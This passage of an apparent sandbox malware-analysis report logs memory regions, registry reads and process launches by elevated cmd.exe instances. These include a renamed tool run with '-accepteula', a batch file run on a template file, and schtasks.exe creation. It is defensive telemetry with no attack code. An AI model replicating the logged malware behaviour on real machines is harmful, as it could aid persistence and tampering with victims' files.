| private_0x0000000000080000 | 0x00080000 | 0x000bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00690000 | 0x009c6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eef0000 | 0x7eef0000 | 0x7efeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eff0000 | 0x7eff0000 | 0x7f012fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f013000 | 0x7f013000 | 0x7f013fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f017000 | 0x7f017000 | 0x7f019fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f01a000 | 0x7f01a000 | 0x7f01cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f01d000 | 0x7f01d000 | 0x7f01dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 224, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0x96c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #117: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #117 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "WinMail.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:43, Reason: Child Process |
| Unmonitor | End Time: 00:04:53, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xedc |
| Parent PID | 0xf04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B38
0x
994
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cb0000 | 0x00cb0000 | 0x00cbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00cc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00cd3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x00cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d00000 | 0x00d00000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00e3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00e50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e61fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e70000 | 0x00f2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ff0000 | 0x00ff0000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x0125ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x010fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0125ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x055fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05600000 | 0x05936fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e7a0000 | 0x7e7a0000 | 0x7e89ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e8a0000 | 0x7e8a0000 | 0x7e8c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e8c7000 | 0x7e8c7000 | 0x7e8c9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8ca000 | 0x7e8ca000 | 0x7e8cafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8cc000 | 0x7e8cc000 | 0x7e8cefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e8cf000 | 0x7e8cf000 | 0x7e8cffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 184, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0x904, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #118: cmd.exe
274
0
| Information | Value |
|---|---|
| ID | #118 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:43, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5c0 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
92C
0x
99C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000850000 | 0x00850000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x0085ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00863fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00871fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x00873fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00893fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x009e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009f0000 | 0x009f0000 | 0x009f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a00000 | 0x00a00000 | 0x00a01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a50000 | 0x00a50000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00ac0000 | 0x00b7dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00ec0000 | 0x011f6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f640000 | 0x7f640000 | 0x7f73ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f740000 | 0x7f740000 | 0x7f762fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f766000 | 0x7f766000 | 0x7f768fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f769000 | 0x7f769000 | 0x7f769fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f76c000 | 0x7f76c000 | 0x7f76efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f76f000 | 0x7f76f000 | 0x7f76ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (202)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
29 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
98 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 15 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 53 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
